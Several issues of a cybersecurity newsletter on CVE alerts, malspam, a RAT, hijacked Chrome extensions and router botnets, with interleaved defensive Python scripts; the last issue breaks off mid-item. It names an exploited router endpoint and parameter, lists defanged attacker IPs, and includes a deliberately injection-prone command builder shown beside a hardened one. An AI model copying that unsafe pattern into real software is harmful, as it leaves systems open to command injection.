🚨 Beware of Email Spoofs! Cybercriminals Ramp Up Malspam Attacks 📧



Welcome to Gone Phishing, your weekly cybersecurity newsletter that wishes you a Happy New Year! 🎉🥳🎊 Unless you’re a cybercriminal, in which case GTFO 🤬

Patch of the Week! 🩹

First things first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the Week. Okay, that’s it… 😳

Congrats to Mitel MiCollab and Oracle WebLogic Server, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣 

The MiCollab the world’s been waiting for 🙃

🚨 New Vulnerabilities Added to CISA KEV Catalog! 📖

CISA has flagged three critical flaws in Mitel MiCollab and Oracle WebLogic Server due to active exploitation. Here's what you need to know! 🛡️💻

The Vulnerabilities

1️⃣ CVE-2024-41713 (CVSS 9.1):

Path traversal in Mitel MiCollab allowing unauthorized, unauthenticated access.

2️⃣ CVE-2024-55550 (CVSS 4.4):

Path traversal in Mitel MiCollab enabling authenticated admins to read local files.

💡 Combo Alert: These two can be chained for remote, unauthenticated access to arbitrary server files! ⚠️

3️⃣ CVE-2020-2883 (CVSS 9.8):

A severe flaw in Oracle WebLogic Server exploitable by unauthenticated attackers via IIOP or T3 protocols.

Why It Matters

Mitel MiCollab flaws were discovered during a probe into another critical bug (CVE-2024-35286, CVSS 9.8).

Oracle warned about CVE-2020-2883 in 2020, noting active exploitation reports.

Over 5,600 Mitel MiCollab instances are exposed online, with the majority in the U.S., Canada, and the U.K. 🌍 

🚨 Patch Now:

Federal agencies must update by Jan 28, 2025, per Binding Operational Directive (BOD) 22-01.

Check Mitel and Oracle resources for latest patches and updates. 

💡 Stay Vigilant: 

  • Review your systems for potential exposure.

  • Monitor logs for signs of exploitation. 

🔧 Don’t wait for a breach—act now to secure your systems! 🖥️🔒 

Now, on to this week’s hottest cybersecurity news stories: 

  • 👾 Malspam evades SPF, DMARC security by utilising neglected domains 🌐

  • 🕵🏼‍♂️ Researchers lift the lid on NonEuclid RAT using UAC bypass, AMSI evasion 🐀

  • ⚠️ 2025: Top malware threats to watch out for this coming year. Take notes 📝

SPF 50 won’t even protect you ☀️

🚨 Beware of Email Spoofs! Cybercriminals Ramp Up Malspam Attacks 📧

Cybersecurity researchers report a surge in spoofed email campaigns 🎯 targeting unsuspecting victims by faking sender addresses to appear legitimate. This tactic helps bypass security systems and trick users into engaging with malicious content.

🛠️ Old Tricks, New Domains

While email authentication protocols like DKIM, DMARC, and SPF exist to combat spoofing, attackers now exploit neglected domains without proper DNS records. These domains, though unused for years, successfully slip past modern filters.
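The point above is that a neglected domain is dangerous precisely because it has nothing for a receiver to enforce: with no SPF record and no DMARC record, a spoofed sender address produces no authentication failure. The script below is an added example (not code from the newsletter or from the researchers it cites) that classifies a sender domain's posture from its TXT records; the DNS answers are constructed inline so it runs offline, and the domain names are hypothetical.

```python
"""Classify a sender domain's email-authentication posture from its DNS TXT records.

Added example, not from the newsletter. DNS answers are constructed below so
the script runs offline; a real deployment would query a resolver instead.
"""
import re

# Constructed TXT records keyed by DNS name (all domains are hypothetical).
# "neglected.example" has no records at all, modelling an abandoned domain.
FAKE_DNS = {
    "well-run.example":        ["v=spf1 ip4:192.0.2.0/24 -all"],
    "_dmarc.well-run.example": ["v=DMARC1; p=reject; rua=mailto:dmarc@well-run.example"],
    "soft.example":            ["v=spf1 include:_spf.example.net ~all"],
    "_dmarc.soft.example":     ["v=DMARC1; p=none"],
}

def lookup_txt(name):
    """Stand-in for a DNS TXT query; returns [] for names with no records."""
    return FAKE_DNS.get(name, [])

def parse_spf(records):
    """Return the SPF 'all' qualifier ('-', '~', '?', '+'), or None if no SPF record."""
    for rec in records:
        if rec.lower().startswith("v=spf1"):
            for term in rec.split()[1:]:
                m = re.fullmatch(r"([-~?+]?)all", term, re.IGNORECASE)
                if m:
                    return m.group(1) or "+"
            return "+"  # no explicit 'all' term: unlisted senders are not failed
    return None

def parse_dmarc(records):
    """Return the DMARC record as a tag dict, or None if there is no record."""
    for rec in records:
        if rec.strip().lower().startswith("v=dmarc1"):
            tags = {}
            for part in rec.split(";"):
                if "=" in part:
                    k, v = part.split("=", 1)
                    tags[k.strip().lower()] = v.strip()
            return tags
    return None

def assess_domain(domain):
    """Summarise what a receiving gateway could enforce for mail claiming this domain."""
    spf_all = parse_spf(lookup_txt(domain))
    dmarc = parse_dmarc(lookup_txt(f"_dmarc.{domain}"))
    policy = dmarc.get("p", "none").lower() if dmarc else None
    findings = []
    if spf_all is None:
        findings.append("no SPF record: any host can claim to send for this domain")
    elif spf_all != "-":
        findings.append(f"SPF ends in '{spf_all}all': spoofed mail is not hard-failed")
    if dmarc is None:
        findings.append("no DMARC record: receivers have no policy to enforce")
    elif policy == "none":
        findings.append("DMARC p=none: failures are reported but still delivered")
    if not findings:
        verdict = "enforcing"
    elif spf_all is None and dmarc is None:
        verdict = "unprotected"
    else:
        verdict = "weak"
    return {"domain": domain, "spf_all": spf_all, "dmarc_policy": policy,
            "verdict": verdict, "findings": findings}

if __name__ == "__main__":
    for d in ("well-run.example", "soft.example", "neglected.example"):
        r = assess_domain(d)
        print(f"{r['domain']:<20} {r['verdict']:<12}", "; ".join(r["findings"]) or "OK")
```

If you manage domains, the "unprotected" verdict is the one to eliminate: publishing `v=spf1 -all` and a `v=DMARC1; p=reject` record on a domain that sends no mail costs nothing and gives receivers something to reject on.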

💡 Tactics in Play:

🔹 Phishing with QR Codes: Fake emails (tax-related in Mandarin) use QR codes linked to phishing sites, stealing IDs and card details.

🔹 Brand Spoofs: Imitating Amazon, Mastercard, and SMBC to harvest credentials via fraudulent login pages.

🔹 Extortion Scams: Threats of leaked “embarrassing videos” demand Bitcoin payments 💸, with fake claims of system compromise.

📋 Other Alarming Trends:

  • Phishing Pages: Hosted on trusted platforms like Canva, Dropbox, and Google AMP.

  • SMS Phishing: Pretending to be law enforcement, targeting victims with fake fines or renewal notices.

  • Sophisticated Scams: Social engineering against Middle Eastern banking customers, exploiting leaked personal data.

🔐 How to Stay Safe:

✔️ Verify sender domains and avoid clicking on unknown links.

✔️ Update your DNS records if you manage domains.

✔️ Report suspicious emails to your email provider.

✔️ Enable 2FA for critical accounts.

⚠️ Pro Tip: Remember, no legitimate organization will ask for sensitive info via email. Stay vigilant! 🛡️

VaultCraft V2 secures $100M+ BTC from Matrixport

VaultCraft launches V2 in partnership with Safe, lands $100M+ in Bitcoin

  • Matrixport entrusts VaultCraft with $100M+ Bitcoin

  • OKX Web3 rolls out Safe Smart Vaults with $250K+ rewards

Visit VaultCraft

Eu wot? 💀

🚨 NonEuclid RAT: A Sophisticated Cyber Threat Unleashed 🖥️

Cybersecurity experts have uncovered NonEuclid, a cutting-edge remote access trojan (RAT) targeting Windows systems. Written in C#, this malware allows attackers to control compromised devices remotely while deploying advanced techniques to evade detection.

🕵️‍♂️ How It Works:

  • Stealth Tactics: Detects analysis tools like taskmgr.exe and processhacker.exe to evade security checks.

  • Sandbox Detection: Identifies virtual environments and terminates if detected.

  • Antivirus Bypass: Disables Microsoft Defender exclusions and dodges AMSI scans.

  • Persistence Mechanisms: Alters Windows Registry and schedules tasks to maintain control.

🔓 Ransomware Twist:

NonEuclid goes beyond typical RAT functions by encrypting files (e.g., .CSV, .TXT) and renaming them with the ".NonEuclid" extension. Essentially, it doubles as ransomware.

🌐 The Spread:

Promoted aggressively on underground forums, Discord, and YouTube since November 2024, the malware includes tutorials, making it attractive to cybercriminals looking for ready-made solutions.

💡 Key Features:

  • Privilege Escalation: Circumvents User Account Control (UAC) to execute commands.

  • Process Management: Uses Windows API calls to terminate analysis tools.

  • Advanced Evasion: Combines stealth and adaptability to outsmart security tools. 

⚠️ Stay Safe!

  • Keep your antivirus updated 🛡️.

  • Regularly review and tighten system privileges.

  • Monitor for suspicious registry changes or scheduled tasks.

  • Educate your team about emerging threats like NonEuclid.

🛑 Remember: The rise of advanced malware like NonEuclid highlights the importance of robust cybersecurity defenses and constant vigilance. Stay ahead of the curve! 🚀
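The "monitor for suspicious registry changes or scheduled tasks" advice above is easy to say and harder to operationalise. The script below is an added example (not the newsletter's or the researchers' code) that scores endpoint telemetry for the two persistence patterns named in the write-up: autorun registry values and newly created scheduled tasks. The sample events are constructed JSON lines; the field names (Sysmon EventID 13 with TargetObject/Image/Details, Security EventID 4698 with TaskName/TaskContent) are an assumption about how your SIEM normalises them.

```python
"""Flag persistence-style telemetry: autorun registry writes and new scheduled tasks.

Added example, not from the newsletter or the malware analysis it summarises.
Events are constructed; field names assume Sysmon (EventID 13) and Windows
Security (EventID 4698) conventions as your SIEM normalises them.
"""
import json
import re

# Autorun registry locations commonly abused for persistence.
AUTORUN_KEYS = re.compile(
    r"\\(CurrentVersion\\(Run|RunOnce)|Winlogon\\(Shell|Userinit))(\\|$)", re.IGNORECASE)
# User-writable directories: an autorun or task pointing here deserves a look.
USER_WRITABLE = re.compile(r"\\(Users\\[^\\]+\\AppData|Temp|Public)\\", re.IGNORECASE)

# Constructed sample events: one benign installer, one suspicious autorun,
# one suspicious task created by a normal user, one benign SYSTEM task.
SAMPLE_EVENTS = r"""
{"EventID": 13, "Image": "C:\\Program Files\\Vendor\\setup.exe", "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\VendorAgent", "Details": "C:\\Program Files\\Vendor\\agent.exe"}
{"EventID": 13, "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\svchost.exe", "TargetObject": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater", "Details": "C:\\Users\\alice\\AppData\\Roaming\\svchost.exe"}
{"EventID": 4698, "SubjectUserName": "alice", "TaskName": "\\Microsoft\\Windows\\UpdateCheck", "TaskContent": "<Exec><Command>C:\\Users\\Public\\update.exe</Command></Exec>"}
{"EventID": 4698, "SubjectUserName": "SYSTEM", "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag", "TaskContent": "<Exec><Command>%windir%\\system32\\defrag.exe</Command></Exec>"}
"""

def score_event(ev):
    """Return the reasons an event looks like persistence; an empty list means benign."""
    reasons = []
    if ev.get("EventID") == 13 and AUTORUN_KEYS.search(ev.get("TargetObject", "")):
        # A vendor installer writing Run keys is normal; the path is the tell.
        if USER_WRITABLE.search(ev.get("Details", "")):
            reasons.append("autorun entry points into a user-writable directory")
        if USER_WRITABLE.search(ev.get("Image", "")):
            reasons.append("autorun written by a process in a user-writable directory")
    if ev.get("EventID") == 4698:
        if USER_WRITABLE.search(ev.get("TaskContent", "")):
            reasons.append("scheduled task command in a user-writable directory")
        if (ev.get("SubjectUserName", "").upper() != "SYSTEM"
                and "\\Microsoft\\Windows\\" in ev.get("TaskName", "")):
            reasons.append("non-system account created a task under the Microsoft task folder")
    return reasons

def find_persistence(jsonl):
    """Parse JSON lines and return (registry path or task name, reasons) for suspicious events."""
    hits = []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        reasons = score_event(ev)
        if reasons:
            hits.append((ev.get("TargetObject") or ev.get("TaskName"), reasons))
    return hits

if __name__ == "__main__":
    for name, reasons in find_persistence(SAMPLE_EVENTS):
        print(name)
        for r in reasons:
            print("   -", r)
```

The scoring deliberately ignores a Run-key write on its own, since legitimate installers do that constantly; it is the combination with a user-writable path, or a non-system account creating tasks in the Microsoft folder, that separates the two suspicious events from the two benign ones.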

Hire Ava, the AI SDR & Get Meetings on Autopilot

Ava automates your entire outbound demand generation process, including:

  • Intent-Driven Lead Discovery

  • High Quality Emails with Waterfall Personalization

  • Follow-Up Management

Free up your sales team to focus on high-value interactions and closing deals, while Ava handles the time-consuming tasks.

Book a demo to see how Ava can 10x your outbound.

And the award for biggest cyberthreat of 2025 goes to… 🏆

🚨 Top Malware Threats to Watch Out for in 2025 💻⚠️

As cyber threats evolve, staying prepared is more important than ever. Here are 5 common malware families you should start preparing to counter today:

1️⃣ Lumma

🔍 What It Does:

  • Steals sensitive data, including credentials and financial info.

  • Logs browsing history and targets cryptocurrency wallets. 

📦 How It Spreads:

Fake CAPTCHA pages, torrents, and phishing emails. 

💡 Defense Tip:

Use sandbox analysis to identify indicators of compromise (IOCs) and enhance your defenses.

2️⃣ XWorm

🔍 What It Does:

  • Offers remote control to attackers.

  • Monitors keystrokes, webcam, audio, and network activity.

📦 How It Spreads:

Delivered through phishing emails with malicious archives.

💡 Defense Tip:

Be cautious with unsolicited emails, especially those containing password-protected archives.

3️⃣ AsyncRAT

🔍 What It Does:

  • Records screens, logs keystrokes, and installs additional malware.

  • Floods websites with traffic (DDoS attacks) and disables security software.

📦 How It Spreads:

Disguised as pirated software or embedded in AI-generated scripts.

💡 Defense Tip:

Avoid downloading unverified software and use advanced sandbox tools for analysis.

4️⃣ Remcos

🔍 What It Does:

Markets itself as a legitimate tool but enables remote control of systems.

Steals data and exploits vulnerabilities like CVE-2017-11882.

📦 How It Spreads:

Distributed via phishing emails with malicious scripts.

💡 Defense Tip:

Regularly patch vulnerabilities and monitor for suspicious PowerShell or Command Prompt activity.

5️⃣ LockBit

🔍 What It Does:

  • Encrypts files and demands ransom for decryption.

  • Operates as part of a Ransomware-as-a-Service (RaaS) model.

📦 How It Spreads:

Targeted attacks on high-profile organizations.

💡 Defense Tip:

Ensure regular backups, implement endpoint protection, and stay informed about emerging ransomware variants like LockBit 4.0.

🛡️ Take Action:

Use tools like ANY.RUN’s Interactive Sandbox for real-time malware analysis. Proactively hunt for threats and bolster your cybersecurity defenses to face 2025 with confidence! 🚀

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!



600k Google Chrome users exposed



Welcome to Gone Phishing, your weekly cybersecurity newsletter that’s the only guaranteed protection against an #AmberAlert cyberstorm ⛈️⛈️⛈️

Patch of the Week! 🩹


Congrats to Palo Alto, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

Take that, ya DoSsers! 🙃

🚨🔥 High-Severity PAN-OS Vulnerability Alert! 🔥🚨

Palo Alto Networks has uncovered CVE-2024-3393, a DoS vulnerability (CVSS score: 8.7) impacting PAN-OS software. This bug could let attackers send malicious packets that reboot firewalls, potentially causing chaos! 🌐💥

What's Affected?

🛑 PAN-OS Versions: 10.X, 11.X, and Prisma Access on PAN-OS 10.2.8+ (or earlier than 11.2.3).

✅ Fixed in: PAN-OS 10.1.14-h8, 10.2.10-h12, 11.1.5, 11.2.3, and later.

What's Happening?

  • Malicious DNS packets can trigger firewall reboots.

  • Repeated attacks = maintenance mode lockdown.

  • Firewalls with DNS Security logging enabled are at risk.

What You Can Do! 🛡️

Patch ASAP using the latest updates for your PAN-OS version.

  • Disable DNS Security logging for unmanaged firewalls: go to Objects > Security Profiles > Anti-Spyware > DNS Policies > DNS Security.

  • Prisma Access Users: Open a support case for quick action!

CISA Adds to KEV Catalog

This vulnerability is now on the CISA KEV list, with a deadline for Federal Civilian Agencies to patch by Jan 20, 2025.

🔧 Proactive measures = safer firewalls. Protect your networks now! 🖥️💪

Now, on to this week’s hottest cybersecurity news stories: 

  • 🙍🏻‍♂️ 600k Google Chrome users exposed to data theft via 16 extensions 🔌

  • 🔐 Default credentials expose 15,000+ Four-Faith routers to new exploit 👾

  • 🌶️ Don’t get burned by CAPSAICIN, a new strain targeting D-Link routers 📡

Hackers: There’s no place like Chrome 💀


🚨 Massive Chrome Extension Hack Hits 600,000+ Users! 🙍🏻‍♂️

Cybercriminals have compromised at least 16 popular Chrome browser extensions, putting over 600,000 users at risk of data theft and credential exposure.

💻 How It Happened:

Hackers targeted extension publishers with phishing emails disguised as messages from "Google Chrome Web Store Developer Support." Victims were tricked into granting permissions to a malicious app, allowing attackers to inject harmful code into legitimate extensions. The compromised versions stole cookies, access tokens, and other sensitive data.

🔥 The first known victim, Cyberhaven, saw its extension hijacked on December 24, enabling malicious code to communicate with an external server, download harmful files, and exfiltrate user information.

🎯 Who’s Affected?

This wasn’t an isolated attack! Researchers uncovered more impacted extensions, including:

🌟 AI tools like AI Assistant – ChatGPT and Bard AI Chat Extension

🔒 VPNs like VPNCity and Internxt VPN

🎥 Tools like VidHelper Video Downloader and Reader Mode

📜 Even Rewards Search Automator and Keyboard History Recorder

⚡ Why It’s Dangerous:

The malicious versions could:

  • Steal sensitive data, including Facebook Ads tokens 🧑‍💻

  • Spy on users and bypass protections 🕵️‍♂️

  • Remain active on devices even after being removed from the Chrome Web Store ⚙️

💡 What You Can Do:

1️⃣ Check your extensions and remove anything suspicious or unused.

2️⃣ Update regularly to secure versions.

3️⃣ Be cautious with unexpected emails—phishing is on the rise! 🚫✉️

🌐 Why It Matters:

Browser extensions often seem harmless, but they can have extensive permissions, making them prime targets for hackers. This attack campaign highlights the need for better visibility and stricter controls over third-party tools.
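"Check your extensions" is more useful when you can say which ones matter. The script below is an added example (not from the newsletter or from any of the extensions named above) that triages extension manifests by the permissions they request, weighting the combination that made this campaign damaging: cookie access plus host permissions on every site. The two manifests are constructed; `scan_profile()` assumes a Chrome-style Extensions directory containing one manifest.json per extension version, whose location differs by OS and profile.

```python
"""Triage Chrome extension manifests by the permissions they request.

Added example; the manifests are constructed, and the profile layout that
scan_profile() walks is an assumption (a directory tree containing
manifest.json files, as Chrome keeps under its Extensions folder).
"""
import json
import os

# Permissions that let an extension read or forge authenticated sessions.
HIGH_RISK = {"cookies", "webRequest", "webRequestBlocking", "declarativeNetRequest",
             "scripting", "tabs", "history", "clipboardRead", "nativeMessaging"}
# Host patterns that grant access to every site.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Constructed manifests: a narrowly scoped one and an over-privileged one.
SAMPLE_MANIFESTS = {
    "aaaa-notes": {"manifest_version": 3, "name": "Quick Notes", "version": "1.2",
                   "permissions": ["storage"], "host_permissions": []},
    "bbbb-helper": {"manifest_version": 3, "name": "Video Helper", "version": "4.0.1",
                    "permissions": ["cookies", "scripting", "storage", "tabs"],
                    "host_permissions": ["<all_urls>"],
                    "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"]}]},
}

def triage_manifest(manifest):
    """Return a risk report for one parsed manifest."""
    perms = set(manifest.get("permissions", []))
    hosts = set(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):   # content scripts also grant site access
        hosts.update(cs.get("matches", []))
    risky = sorted(perms & HIGH_RISK)
    broad = sorted(hosts & BROAD_HOSTS)
    # Session-cookie access on every site is what turns a hijacked update
    # into account takeover, so that combination is weighted highest.
    score = len(risky) + 2 * len(broad)
    if "cookies" in perms and broad:
        score += 3
    level = "high" if score >= 5 else "medium" if score >= 2 else "low"
    return {"name": manifest.get("name"), "version": manifest.get("version"),
            "risky_permissions": risky, "broad_hosts": broad, "score": score, "level": level}

def scan_profile(extensions_dir):
    """Walk an extensions directory and triage every manifest.json, riskiest first."""
    reports = []
    for root, _dirs, files in os.walk(extensions_dir):
        if "manifest.json" in files:
            with open(os.path.join(root, "manifest.json"), encoding="utf-8") as fh:
                reports.append(triage_manifest(json.load(fh)))
    return sorted(reports, key=lambda r: -r["score"])

if __name__ == "__main__":
    for ext_id, manifest in SAMPLE_MANIFESTS.items():
        r = triage_manifest(manifest)
        print(f"{ext_id}: {r['name']} {r['version']} -> {r['level']} "
              f"(perms={r['risky_permissions']}, hosts={r['broad_hosts']})")
```

A "high" result does not mean the extension is malicious, only that a compromised update to it would have everything it needs; those are the ones to justify, pin, or remove.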

Stay safe, stay updated, and protect your online world! 💪✨

Get the complete picture of AI from an expert with nearly a decade of experience.

What You Need To Know About AI is an upcoming book exploring AI’s history, what modern AI can (and can’t) do, and what it means for you and the future.

Learn how it's being used in medicine, finance, and more. Get past the hype and understand how AI works in an accessible, but not dumbed-down way.

Password123 👍

🚨 New Exploit Targets Industrial Routers! 🌐

A high-severity flaw in select Four-Faith industrial routers (models F3x24 and F3x36) has been actively exploited in the wild, according to VulnCheck. This vulnerability, tracked as CVE-2024-12856 (CVSS score: 7.2), poses a significant threat, especially if default credentials have not been updated.

💥 The Vulnerability:

The flaw allows attackers to perform OS command injection on vulnerable routers, but only if they manage to authenticate. Here’s the catch—many of these routers still use default credentials, making it easy for bad actors to bypass this restriction.

🛠️ How the Attack Works:

  • Endpoint Exploited: /apply.cgi

  • Weakness: The adj_time_year parameter in system time settings is vulnerable.

  • Payload: Attackers leverage this flaw to launch a reverse shell, giving them persistent remote access to the device.
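The bug class here is a form field that ends up inside an operating-system command. The snippet below is an added illustration (hypothetical handler, not Four-Faith's code, and it does not reproduce the exploit) of the unsafe pattern beside the hardened one for a time-setting parameter like `adj_time_year`: neither function executes anything, both return the command they would run, so the difference is visible without touching a clock. Field names beyond `adj_time_year` are assumptions.

```python
"""Vulnerable vs hardened handling of a time-setting form field that reaches a system command.

Added illustration of the bug class; the handler is hypothetical and nothing
here is executed. Only 'adj_time_year' comes from the write-up above; the
month/day field names are assumptions.
"""
import re

def build_date_command_unsafe(form):
    """Vulnerable pattern: interpolate request fields straight into a shell string."""
    year = form.get("adj_time_year", "")
    month = form.get("adj_time_month", "1")
    day = form.get("adj_time_day", "1")
    # Whatever the client sends becomes part of the command line handed to a shell.
    return f"date -s '{year}-{month}-{day}'"

class BadInput(ValueError):
    """Raised when a field fails whitelist validation."""

def build_date_command_safe(form):
    """Hardened pattern: strict whitelist validation, then an argv list with no shell."""
    def field(name, lo, hi):
        raw = form.get(name, "")
        if not re.fullmatch(r"\d{1,4}", raw):          # digits only, nothing else
            raise BadInput(f"{name}: expected digits only, got {raw!r}")
        val = int(raw)
        if not lo <= val <= hi:                          # and within a sane range
            raise BadInput(f"{name}: {val} outside {lo}..{hi}")
        return val
    year = field("adj_time_year", 2000, 2099)
    month = field("adj_time_month", 1, 12)
    day = field("adj_time_day", 1, 31)
    # Suitable for subprocess.run(argv) with shell=False; no metacharacter is interpreted.
    return ["date", "-s", f"{year:04d}-{month:02d}-{day:02d}"]

def handle_apply(form, authenticated):
    """Mimics the /apply.cgi contract: authentication first, then validated input only."""
    if not authenticated:
        return {"status": 401, "argv": None}
    try:
        return {"status": 200, "argv": build_date_command_safe(form)}
    except BadInput as exc:
        return {"status": 400, "argv": None, "error": str(exc)}

if __name__ == "__main__":
    good = {"adj_time_year": "2024", "adj_time_month": "12", "adj_time_day": "19"}
    print(build_date_command_unsafe(good))
    print(handle_apply(good, authenticated=True))
    print(handle_apply({"adj_time_year": "2024;"}, authenticated=True))
```

Two things to take from the hardened version: the check is a whitelist (digits, range) rather than a list of forbidden characters, and the command is passed as an argument vector so there is no shell to interpret anything. The authentication gate is still necessary, but as the write-up notes it is worth little while default credentials remain in place.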

📍 Origins of the Attack:

The latest exploitation attempt came from IP address 178.215.238[.]91, which has been linked to previous attacks on Four-Faith routers.

This IP has also been associated with the exploitation of CVE-2019-12168, another remote code execution flaw.

Reports from GreyNoise show similar attacks as recent as December 19, 2024.

🌍 Scope of the Threat:

Over 15,000 internet-facing devices are potentially at risk, according to data from Censys.

Evidence suggests these attacks may have started as early as November 2024.

Attackers appear to be spamming the entire internet at low rates, aiming to deliver a Mirai-like payload.

🔒 What You Can Do:

1️⃣ Change Default Credentials Now 🛡️—this simple step can block unauthorized access.

2️⃣ Limit Internet Exposure 🌐—restrict access to routers only to trusted networks.

3️⃣ Monitor for Unusual Activity 👀—keep an eye out for suspicious connections.

4️⃣ Await further updates: As of now, no official patch has been released.

📅 VulnCheck responsibly disclosed the flaw to Four-Faith on December 20, 2024, but there’s no word yet on a fix.

💬 Expert Insights:

Jacob Baines, VulnCheck: “The attacks aren’t widespread but are consistent, targeting the entire internet at low rates.”

🚨 Why It Matters:

Industrial routers are critical for IoT and operational systems, making vulnerabilities like CVE-2024-12856 a high-priority risk for businesses.

Stay vigilant and secure your devices to prevent falling victim to these attacks! 🛠️✨

Quick, pass the milk! 🥛👀😏

Cybersecurity researchers are ringing alarm bells over a surge in malicious campaigns targeting vulnerable D-Link routers, hijacking them into two distinct botnets:

  • FICORA (a variant of Mirai)

  • CAPSAICIN (a Kaiten/Tsunami derivative)

💥 What’s Happening?

These botnets exploit long-known vulnerabilities in D-Link routers’ HNAP (Home Network Administration Protocol) interface, enabling attackers to execute malicious commands. Vulnerabilities leveraged include:

📅 CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112—some dating back nearly a decade!

🌍 Scope of the Attacks:

FICORA: Attacks are widespread, targeting systems globally.

CAPSAICIN: Focused on East Asian regions, especially Japan and Taiwan, with peak activity on October 21–22, 2024.

🔧 How They Work:

FICORA Botnet:

1️⃣ Deploys a downloader script (multi) from IP 103.149.87[.]69.

2️⃣ Fetches malware for various Linux architectures via commands like wget, curl, and tftp.

3️⃣ Equipped with DDoS capabilities using UDP, TCP, and DNS protocols.

4️⃣ Performs brute-force attacks using a hard-coded username-password list.

CAPSAICIN Botnet:

1️⃣ Uses a downloader script (bins.sh) from IP 87.10.220[.]221.

2️⃣ Establishes a connection with its C2 server (192.110.247[.]46).

3️⃣ Sends OS info and victim "nickname" back to the C2.

4️⃣ Awaits further commands, including:

  • Execute shell commands 🖥️

  • Download files 📂

  • Launch DDoS attacks 🌐

💥 Notable DDoS methods:

  • BLACKNURSE: ICMP packet floods 🌀

  • HTTP Flooding 📶

  • DNS Amplification 🌎

🤖 A Battle for Control:

CAPSAICIN actively terminates other botnets’ processes to dominate compromised devices, ensuring it's the sole operator.

💡 Why It Matters:

Even though these vulnerabilities were disclosed and patched long ago, many devices remain unpatched and exposed. The attacks highlight the importance of regular device updates and robust monitoring.

🛡️ What Can You Do?

🔑 Update firmware immediately to patch known vulnerabilities.

🚫 Restrict external access to router management interfaces.

🔍 Monitor network traffic for unusual activity.

🧹 Change default credentials to thwart unauthorized access.
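Both the Four-Faith and D-Link write-ups above tell you to watch for unusual connections, and both quote defanged addresses. The script below is an added example (not from the newsletter or the cited reports) that refangs those indicators and matches them against flow records; the records and the `ts,src,dst,dport,proto` layout are constructed assumptions about your export format, and the indicator labels are taken from the two write-ups.

```python
"""Refang defanged indicators and match them against flow records.

Added example; the indicator strings are the defanged addresses quoted in the
Four-Faith and D-Link write-ups, the flow records are constructed, and the
CSV layout (ts,src,dst,dport,proto) is an assumption about your export format.
"""
import csv
import io
import ipaddress

# Defanged indicators exactly as they appear in the write-ups above.
DEFANGED_IOCS = {
    "178.215.238[.]91": "Four-Faith exploitation source (VulnCheck)",
    "103.149.87[.]69":  "FICORA downloader host",
    "87.10.220[.]221":  "CAPSAICIN downloader host",
    "192.110.247[.]46": "CAPSAICIN C2",
}

def refang(indicator):
    """Undo common defanging of an IP address and validate it; raises ValueError otherwise."""
    cleaned = indicator.strip().replace("[.]", ".").replace("(.)", ".").replace("[dot]", ".")
    return str(ipaddress.ip_address(cleaned))

IOC_TABLE = {refang(k): v for k, v in DEFANGED_IOCS.items()}

# Constructed flow records: one outbound hit, one inbound hit, two benign flows.
SAMPLE_FLOWS = """ts,src,dst,dport,proto
2024-12-19T03:12:44Z,10.0.5.7,192.110.247.46,443,tcp
2024-12-19T03:13:01Z,10.0.5.7,93.184.216.34,443,tcp
2024-12-19T04:40:09Z,178.215.238.91,203.0.113.20,80,tcp
2024-12-19T04:41:15Z,10.0.5.9,1.1.1.1,53,udp
"""

def match_flows(csv_text, ioc_table=IOC_TABLE):
    """Return one record per flow whose source or destination is a known indicator."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        for side in ("src", "dst"):
            label = ioc_table.get(row[side])
            if label:
                hits.append({
                    "ts": row["ts"],
                    # A match on src is traffic coming at you; on dst it is a device
                    # on your side reaching out, which for a C2 address is the worse sign.
                    "direction": "inbound" if side == "src" else "outbound",
                    "indicator": row[side],
                    "label": label,
                    "dport": int(row["dport"]),
                })
    return hits

if __name__ == "__main__":
    for h in match_flows(SAMPLE_FLOWS):
        print(f"{h['ts']} {h['direction']:<8} {h['indicator']:<16} :{h['dport']}  {h['label']}")
```

An outbound match to the C2 address from an internal router is the one that should page someone: it means the device has already run the downloader, not merely been scanned.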

💬 Expert Take:

“Despite patches being available for nearly a decade, these attacks persist globally,” warns Vincent Li from Fortinet FortiGuard Labs. “Keeping devices updated and secure is not optional—it’s essential.”

⚠️ Don’t let your router become a botnet’s new recruit. Protect your network now! 🌐🛡️


🚨 Charming Kitten is back



Welcome to Gone Phishing, your weekly cybersecurity newsletter that supports more white hats than a Beyonce halftime show 🥼💃🏾🤠 #EthicalHackers #WhiteHat #NoDiddy 💀💀💀

Patch of the Week! 🩹


Congrats to Sophos, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

Hackers: Sophos but yet so far 🙃

🚨 Sophos Firewall Hotfixes Released for Critical Flaws 🔒

Sophos has issued hotfixes to address three security vulnerabilities in its Firewall products, including two rated Critical (CVSS 9.8). While no evidence of active exploitation exists yet, these flaws could lead to Remote Code Execution (RCE) and privileged system access under specific conditions.

🛠️ The Vulnerabilities:

1️⃣ CVE-2024-12727 (CVSS 9.8)

  • Type: Pre-auth SQL Injection

  • Impact: RCE when Secure PDF eXchange (SPX) and High Availability (HA) mode are configured together.

  • Affected Devices: ~0.05%.

2️⃣ CVE-2024-12728 (CVSS 9.8)

  • Type: Weak Credentials Vulnerability

  • Impact: Persistent weak SSH passphrase allows privileged access post-HA setup if SSH is enabled.

  • Affected Devices: ~0.5%.

3️⃣ CVE-2024-12729 (CVSS 8.8)

